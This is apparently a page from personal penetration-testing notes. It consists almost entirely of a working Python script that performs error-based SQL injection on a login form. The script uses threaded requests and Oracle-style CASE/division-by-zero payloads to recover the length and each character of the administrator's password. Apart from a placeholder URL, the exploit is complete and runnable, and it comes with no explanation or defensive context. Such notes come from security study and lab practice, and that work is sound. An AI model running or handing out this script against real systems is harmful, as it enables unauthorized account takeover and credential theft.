search
Extra Notes

Error Base

# Error-based injection in the login page. 
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# SETUP
url = "http://target-site.com/login"  # Replace with actual target
needle = "Welcome"  # Text that appears when no error occurs
headers = {"Content-Type": "application/x-www-form-urlencoded"}
max_threads = 10

# Error Detection
def is_error_triggered(payload):
    data = {"username": payload, "password": "irrelevant"}
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        return needle not in response.text
    except requests.RequestException:
        return False

# Find password length
def test_length(length):
    payload = f"'||(SELECT CASE WHEN LENGTH(password)={length} THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
    if is_error_triggered(payload):
        return length
    return None

def find_password_length():
    print("[*] Searching for password length...")
    with ThreadPoolExecutor(max_threads) as executor:
        futures = [executor.submit(test_length, i) for i in range(1, 51)]
        for future in as_completed(futures):
            result = future.result()
            if result:
                print(f"[+] Password length found: {result}")
                return result
    print("[-] Failed to find password length")
    return None

# Extract password
def test_char(position, char):
    payload = f"'||(SELECT CASE WHEN SUBSTR(password,{position},1)='{char}' THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
    if is_error_triggered(payload):
        return char
    return None

def extract_password(length):
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+"
    password = ""
    print("[*] Extracting password...")
    for i in range(1, length + 1):
        with ThreadPoolExecutor(max_threads) as executor:
            futures = [executor.submit(test_char, i, c) for c in charset]
            for future in as_completed(futures):
                result = future.result()
                if result:
                    password += result
                    print(f"[+] Found character {i}: {result}")
                    break
    print(f"[โœ“] Extracted password: {password}")
    return password

# MAIN
length = find_password_length()
if length:
    extract_password(length)
PreviousBlind SQLNextAll my certificate

Last updated